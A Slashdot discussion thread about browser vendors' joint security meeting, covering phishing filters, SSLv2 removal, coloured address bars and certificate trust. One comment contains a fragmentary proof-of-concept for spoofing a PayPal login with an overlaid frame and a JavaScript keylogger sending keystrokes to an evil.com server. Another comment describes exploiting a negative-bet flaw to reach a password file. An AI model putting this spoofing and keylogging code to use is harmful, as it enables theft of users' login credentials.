Slashdot Mirror
Web Browser Developers Work Together on Security
JRiddell writes "Security developers for the four major browsers recently met together to discuss Web security. The meeting, hosted by Konqueror's George Staikos, looked at future plans to combat the security risks posed by phishing, ageing encryption ciphers and inconsistent SSL Certificate practise. IE 7 is one of the first browsers to implement some of the ideas discussed such as colour coding location bars and an anti-phishing database." From the article: "The first topic and the easiest to agree upon is the weakening state of current crypto standards. With the availability of bot nets and massively distributed computing, current encryption standards are showing their age. Prompted by Opera, we are moving towards the removal of SSLv2 from our browsers. IE will disable SSLv2 in version 7 and it has been completely removed in the KDE 4 source tree already."
These improvements sound good. But can I make a further suggestion?
Like many people, I have a few sites that I want complete assurance about, such as my personal banking sites. I don't want to simply trust a third-part CA to vet them, even if it is capable of providing high-assurance. As well as concerns about the business model for that CA, it still will sign a very large number of web-site certificates. If any of those web sites were compromised or the CA was tricked into signing a certificate, it opens an opportunity for the browser to say "highly trusted" when it isn't - and may even be a different web site if DNS could be compromised. And I expect it would take a long time, if possible at all, to persuade all sites to get the signed by one of the "blessed" CAs.
I much prefer the model used by the Petnames extension of Firefox (http://www.waterken.com/user/PetnameTool/), which allows me to register the server digital certificate thumbprint, and to give the site a nick-name ("My bank"). If the certificate changes in any way, I'll get warned and can do the appropriate checks. Effectively I'm managing my own white-list of a handful of sites, so don't need to trust someone else's whitelist of tens of thousands; or even worse a blacklist of far more.
This can co-exist with the proposals above; for example by allowing the user to store their trust relationship which then displays (say) a blue address bar. Other sites will go through the green / red / white display.
Please mod me only (+) Underrated or (-) Troll
I've seen several site operators let their sites sit with SSL warning boxes because they insist on using a self-issued SSL certificate instead of paying for a major brand name label.
Most of the time, this isn't exposed to customers, but employees of the organization are trained to ignore the "This certificate was not issued by a trusted authority," warnings, and I fear such people will take away that that box with all of its technobabble is one they should ignore at all times. That box is a last line of defense against an encrypted connection that isn't trustworthy... and I think this is a step forward to the point where browsers will refuse to give SSL encryption without SSL authentication succeeding.
Competition has raised the standards of what we expect out of a browser. Collaboration is a great idea especially if I can submit private information without be paranoid. I worry that one day the browser market will be monopolized again, and I will have to use something that is about as safe as letting a toddler play with a cheese grater.
Just remove forms! Voila!
Would someone mind explaining the removal/disabling of SSLv2? More importantly, what's slated to be used in place of it?
What if the entire Universe were a chrooted environment with everything symlinked from the host?
In case anyone's curious, here is a description of the problems with SSLv2, including some info about the newer v3 stuff.
Free Conference Call -- No Spam, High Quality
Stop coding in C/C++ when the product will be exposed to external, uncontrolled inputs. Java, .NET, Parrot... I don't really care what gets used, but it has been clear that despite the constant "C++ using the proper string libraries is as secure as virtual machines and interpreters" cries that those who actually wield the language to make products like browsers are still failing to secure against the most basic and common flaw: the buffer overflow. Browsing web pages is *not* the kind of thing that requires "bare to the metal" coding. Yes, such a browser might be vulnerable to attacks on the virtual machine itself... but a quick look at the browsers security history verses virtual machine security histories makes it clear that is a tradeoff worth making.
Sig under construction since 1998.
Copied from here?
SteveM
so wonder what the tone was like. smarty pants contest?
or 'here we are caring and sharing and collaborating! let's standardize on a little lock icon!'
Is to not have the[a[ web browser interfaced with kernel/operating system. A stand-alone application browser (a la K-Meleon, Firefox, etc.) will immediately stop the devs having to worry about other security overheads (reference IE that is built in (badly) to handle all sorts of stuff that it shouldn't even touch).
"IE 7 is one of the first browsers to implement some of the ideas discussed such as colour coding location bars"
I like how this person uses "one of the first" in a positive sense.
It's nice to see Microsoft participating in the event. I was surprised; I didn't think they sat round tables with open source developers. Does this happen in other areas of development?
Open Source Drum Kit, LPLC deve board - mjhdesigns.com
I see on the screenshots that IE7 is gonna use a yellow location bar to indicate a suspicious web site. Ironically, in Firefox, that same color indicates a secured site. I'm sure somebody will be fooled someday...
I hate all sigs, mine included.
...developers need to be aware of how to write secure server-side code. Joseph Hemler's book Network Security Tools has a chapter about finding security flaws with static analysis tools like PMD.
The Army reading list
Can we find a better name then phishing? Most people don't get it, and wave it off as just another over complicated word that people who think they are smart use. They will ignoring an anti-phishing filter because they just don't know it is.
We need a none geek term for this, something that is clear and easily understandable. "Malicious Websites" or an "Identity Theft Filter" just not phishing.
I'm happy to see that we're looking at an important part of a free competitive market: voluntary cooperation for better competitive products.
The security enhancements we'll see that come out of these (and future) discussions will help all users yet also increase competitiveness in other areas. We didn't need a Congress or government body to force regulations, they're occurring out of customer need.
Note that government could create regulations but we all know that those regulations come too late and can never adapt to current and future ever-changing needs.
I read a great article today about the historical growth of the Net because of the lack of regulations and taxes.
Many users have significant problems when anything changes in their computer experience; my father for example. I tried moving him over to Firefox so that he could stay away from spyware et al, but he couldn't make the move because he couldn't navigate the user interface anymore. This man is no dullard either. He taught me to program when I was 8, has a PhD in (if I remember correctly) biology, pharmacology, or physics, teacheds microbiology, and is an associate dean at world-class university. For all of his smarts, he has had problems with computers ever since he was weened off of DOS and onto Windows 3.1. After many years of training he's finally to the point where he can work successfully in an evironment as long as nothing ever changes.
Skip ahead to Windows XP service pack 2. Automatic updates are now on. He's been trained to allow the updates to happen, but only after I get a phone call asking me if they're ok. Unfortunately, updating sometimes means that I have to spend an hour or so teaching how to burn cds, how to switch between home/work networks, how to play music, etc. at regular intervals. I rue Microsoft not for their lax security (well, not just for their lax security), but for their ever present desire to "upgrade" their interfaces to make them "easier."
At his work they upgrade computers relatively often. The day will come when he will have to call me each time he goes to a website with the "wrong" color.
><));>
I seem to remember a green or blue bar when an https connection worked, and red when there were errors validating the certificate.
Later versions made this less obvious, with the key in the status bar.
Hands in my pocket
In the very near future the single most important attack vector for webspoofing will be subversion of the local system. Once you get access to the local system, you can manipulate DNS and the certificate store as well, so no offline or online spoof check has a fighting chance of working reliably. For this to change, users would have to stop browsing with full privileges. IOW, it's good that browser developers keep working on improving security, but the bigger security improvements lie elsewhere.
Also, please don't confuse users by using different location bar coloring schemes. Firefox already uses yellow for SSL secured sites. If Microsoft makes yellow to mean "potential spoof", nothing good will come of it. IMHO having the browser give you "green lights" is a stupid idea. The best you can do is recognize when a security sensitive operation is taking place and alert the user to that fact. More than that will only provide a false sense of security. Use red when you know that a site is a spoof or encryption is insufficient, use yellow when a site uses sufficiently strong SSL.
Ideas such as colour coding location bars and an anti-phishing database.
Do they mean like in the Netcraft anti-phishing toolbar?
My Karma: ran over your Dogma
StrawberryFrog
OK, raise your hand if you think there's a clearly identifiable "four major web browsers." As in, when you hear the phrase "representatives of the 4 major web browsers" you know exactly which 4 are being talked about.
OK, now how many of you had Konqueror as one of the 4?
C'mon--I like Konqueror as much as the next user, but beyond IE and Firefox there are a large number of minor browsers out there. Mozilla, obviously, unless you lump that with Firefox as I do. Then probably Opera. And then, what, Safari? Konqueror is maybe 6th or 7th. So how "cross browser" is this?
I've always thought that a tiny padlock in the status bar is not enough visual indication for the average user, so it's about time someone comes up with something better. Microsoft has a great idea here, but I don't think a simple color change is good enough. There should be textual feedback. Now, if they were to use the status bar more effectively (such as "SSL Encrypted via Verisign") with color differentiation, they'd really be onto something. A simple color shift? I'd bet that the average Joe Sixpack will say "ooooh, purty" and be totally unaware that he's submitting his credit card to a Nigerian scammer.
Regarding removal of SSL: WHY? A self-issued certificate is perfectly good for corporate email sites and things like that. If the system is flawed, address the flaws, but don't throw out an entire legacy system which is still in widespread use. But then by that logic, that is also how Windows came to inherit all of the security flaws it has now, I suppose.
The Christian Right is Neither (Christian nor right). See: Matthew 23, Matthew 25, Ezekiel 16:48-50
I'd like to see visual cues for IRIs containing chacracters not from my locale; and for characters not from the locale of the displayed document. "Different codepoints, similar glyph" is going to become another vector for phishing, I think.
Nothing to see here. Move along.
Really, this is a blank comment.
OK, it isn't. But Slashdot ruined my joke by not letting me post one.
tasks(723) drafts(105) languages(484) examples(29106)
Mozilla - "What we REALLY need is for all browsers to comply to some sort of standard, so that users dont have the compatibility headaches they currently have" Microsoft - "Aww, come on, that would be too much effort! Cant we just fiddle with pretty colours?"
IE
Firefox/Mozilla
???
???
SSLv2 is disabled by default in Firefox.
:)
You don't need to have a major release of your broweser in order to change just one setting.
I've seen a number of posts about encryption being the problem. It's not. Yes, it is possible to crack some older algorithms with distributed botnets, yes, self-signed certificates pose a problem, but no, these are not the real problems. The real problems facing users (by this I mean the problems causing financial damage to consumers and companies) come from attacking the user and his/her environment, not attacking the encryption. When was the last time you saw someone brute-forcing the decryption of a session, with the purpose of obtaining the user's information? This makes great stuff for movies where we're tyring to crack into an Evil Foreign Government or an ultra-sophisticated criminal, but in real life this is not the threat.
The threats that browsers need to address is the fact that their *users* and their user's *environments* are being attacked. Phishing attacks don't target weak encryption protocols. Heck, most don't even bother setting up an SSL-enabled phishing site, because people don't look for encrypted sessions in general. Phishing attacks target the user by attempting to fool the person into believing that they are at the actual site. Ask yourself - would your mother know that chase-online-banking.com is not the real address for Chase's online system? (Phishing trends show that phishers are increasingly using name-based attacks, as opposed to an IP-based URL).
As for attacking the environment, keyloggers and malware in general are exploding in popularity. Again, this is not a problem with the encryption protocols used for securing sessions, rather it's the user's environment being attacked. One must remember that browsers don't run in a vacuum - they have a user and an environment. Using 256-bit AES encryption is great, nifty, and cool, but if my mother's computer has a keylogger installed and I decide to do some e-banking while visiting for the holidays, well then I've got a problem.
People need to re-evaluate security in the context of which these applications are run, and stop thinking that simply increasing keylength or swapping cipher algorithms will solve the problem. It won't. Our problem is that security isn't usable, it isn't intuitave, and untill we make it so we will continue to have these problems.
I recon its a great idea to avoid phising sites, maybe from a nerds point of view it isnt so great for the avg joe it looks like a winner.
... After ie 7 i dont want to hear another word about other software vendors floggins ideas from ms, it goes to show how much they all flog from each other ...
The only problems i have is the fact that the newer versions of ie will incorpoerate tabbed browsing and the MSN search tool which looks almost exactly like the firefox search tool
I agree that "phishing" is arcane and not helpful to people who aren't already familiar with the term and concept. But I think "Identity Theft Filter" is a bit confusing. I feel like a lot of people don't understand what identity theft is. "Malicious Websites" is OK, but it doesn't really explain how the site is malicious. (Browser exploit? Hate speech? etc.) Maybe "Deceptively Disguised Website" would be a good starting point. From there applications could guide users to explanations of why and (in simple terms) how websites are disguised, and what can happen if you're foolish enough to trust one.
---GEC
I'm but the humble pupil, seeking to snatch the scratchbuilt pebble from the master's fully articulated hand
What are IE7, Konq, FF and other next gen web browsers doing to stop self-signed certs?
A screen full of technobabble isn't enough. A warning that the site is suspicious, as used for other dodgy sites, is better.
to Cross-Site-Scripting. Why should I try to spoof a site, if I can simply take the orginal website und capture or modify it on-demand?
c om"+" (many spaces).hehe-dnsismagic.evil.com');
// modify the website as you wish }
// yeah, that works cross-domain!
[p][a id="SPOOF" href="xttp://www.evil.com/evil.htm"][/a][/p]
[div][a href="xttps://login.paypal.com"]
[table][caption]
[a href="xttps://login.paypal.com"][label for="SPOOF"][u style="cursor: pointer; color: blue"]
xttps://login.paypal.com[/u][/label][/a]
[/caption][/table]
[/a][/div]
evil.htm:
[script]
window.open('evil2.htm','','xttps://login.paypal.
[/script]
evil2.htm:
[html]
[div style="position: absolute; left: 405px; top: 245px;"][input name="login" id="login" style="border: 0px none ; width: 145px; height: 18px; z-index: 12; font-size: x-small; font-family: Arial,Helvetica,sans-serif;" value="" type="text"][/div]
[div style="position: absolute; width: 155px; height: 28px; left: 7px; top: 122px; background-color: red; z-index: 11;" onclick="focus()" unselectable="on"][/div][!--position it right, baby!--]
[script]
var keylog='';
var login=document.getElemtentById('login');
document.onkeypress = function () {
k = window.event.keyCode;
keylog += String.fromCharCode(k);
login.value=keylog;
submitkeylogtomyserver(); }
[/script]
[frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*"]
[frame src="xttps://login.paypal.com" scrolling="auto"]
[/frameset]
Or, even simpler:
window.prototype.x=new function() {
window.open('evil3.htm','','');
waitsometime();
window.location='https://login.paypal.com';
evil3.htm:
waitsometime();
window.opener.x();
Anyway, it should be much simpler to simply install some malware through on of those unpatched remote code execution security holes.
As long as Microsoft leaves those, well I counted: 49 (!) still unpatched security holes wide open, the Phishing filter is pretty useless.
I typed "web browser firewall" at download.com and got this
- 8022_4-10461208.html?tag=lst-0-2
7 1435.html?tag=lst-0-4
http://www.download.com/SpyWall-Anti-Spyware/3000
seems like there is a firewall for web browser now.
and another one....
http://www.download.com/Sandboxie/3000-2366_4-103
I read a study recently that most phishing web sites don't live longer than a week...
A database of unimportant entries is not going to do any good.
I figure that Microsoft will have to keep a staff of around a dozen people day and night checking out each one of these flagged URLs as soon as the URLs come in, or otherwise it is not going to be very effective.
"We mustn't be caught by surprise by our own advancing technology" -- Aldous Huxley
In what culture does a yellow traffic light not mean caution?
http://www.yafla.com/dforbes/2005/11/22.html#a191
(I saw that on Digg, btw, but of course it quickly cycled off the page while the groupthink herds were busy pushing up every lame story about the FireFox religion)
A bad programmer can be equally incompetant in any language.
A few security holes I've found:
A system where you can gamble online credits, you bet n credits, and a number between 1 and 5 was generated, if you guessed the number, you would win 4 times your bet, otherwise you lose your bet, maximum winnings of 100 credits a day. I bet -1000000000 credits, so when I lost I gained 4000000000 credits. (which errored out and dumped me to a command prompt, from which I could read/edit the password file)
Sending an e-mail to an 'anonymous' mail service with an HTML document enclosed with an image linked to my own web server, gave me the the IP address of the recipient.
A commercial web site that allowed me to enter a username of blah blah blah, which it would then display to other users of the site.
Aging - not ageing.
..."
As in "The aging process must have been accelerated for the person who wrote the post
Please tell us what culture uses a yellow traffic light to mean something besides caution.
I tried to install Java on my computer. I gave up when I discovered that Sun won't let me install it directly. I have to make special effort to agree to their license. FreeBSD-ports cannot include it directly. I can deal with it, but it isn't worth the bother.
However things get worse when you are not a personal user. At work we are interested in an open-source project written in Java, but because of the license we cannot use it. (We want to ship it as part of an embedded system, the only way to install would be to have every customer download the JVM somehow) DOA because of this. (We tried gcj but were unable to get it to work - I wish that effort luck though)
Sun does not want Java to succeed. I'm all for helping them in that goal.
IE 4, IE 5, IE6, and IE 7? Maybe you mean the 1 major browsers, and 3 other guys who like to talk about how major they're gonna be in a couple years.
You do not understand why we come to /.
Hint: It isn't the stories as such.
The claim is that IE7 is "one of the first" browsers to have a color-coded location bar. Maybe "one of the last" is more appropriate?
How does this colour coding help people who are colour blind?
Just an idea, buf there is a link like www.ebay.com, the browser should show a warning that your using a deceptive URL. I'm sure implementing a good way to handle that is another story though...
Scott Swezey
Nope, it would not. This is by design. Server certificates expire, so they have to be changed every year, or every second year. This is supposed to take place without any warning displayed to the user. The browser does not remember the server certificate, it just checks that it is signed by one of the CAs on it's installed list of CAs.
You may be thinking of the way ssh handles "trusted hosts". Ssh asks you if you will trust a host the first time you connect to it, and stores the host's key in the "trusted hosts" list. If that key changes, ssh will give a really stern warning. SSL does not work that way.
SSL is based on the "Trusted Third Party". The CAs are the trusted third parties. The browser vendors decide which CAs to add to the list by default. If you don't trust them, you will have to remove them manually, if the browser or operating system allows that (on some embedded devices it's take it or leave it).
FireFox : changes color for secure connections, etc... (your e-Banking site is yellow, because of https & validate certificate)
There's also proposition to change color when using mixed caracter bank (warning for cyrillic/latin homographs, etc...)
etc...
IE7 : changes color for URLs from known spoofer (www.paypaI.com is red because it's in a phisher-black-list. But new phisher won't be red until added to black-list.).
It's 2 different coloring methods, it's heuristic vs. "list-of-known-evil"
"Sufficiently advanced satire is indistinguishable from reality." - [Tips: 1DrYakQDKCQ6y52z6QbnkxHXAocMZJE61o ]
TrustBar is a FireFox extension that already (and for a while already) implements your proposal... Namely, it supports both `petnaming` of a site, i.e. to assign a name (or, with TrustBar, a logo) to a site, and also display of the name of the organization and of the CA, like IE 7 (and future browsers). It is the result of secure usability study by Ahmad Jbara and myself, and has some other mechanisms, including random `exercise training attacks` to help users stay trained to watch for the name/logo of the site. (I must admit that this mechanism is now set for too frequent `exercise attacks`, we will improve this in our next release very soon, but you can also reduce or eliminate this using the user interface of course).
There are some differences in the way TrustBar and Petname extensions handle the `petnaming` aspect; of course, I think what we do is more correct, and Tyler (Petname developer) disagrees... we use the anti-fraud forum to discuss such issues, join us if interested.
Best, Amir Herzberg
Prof. Amir Herzberg Dept. of Computer Science, Bar Ilan Univ. http://AmirHerzberg.com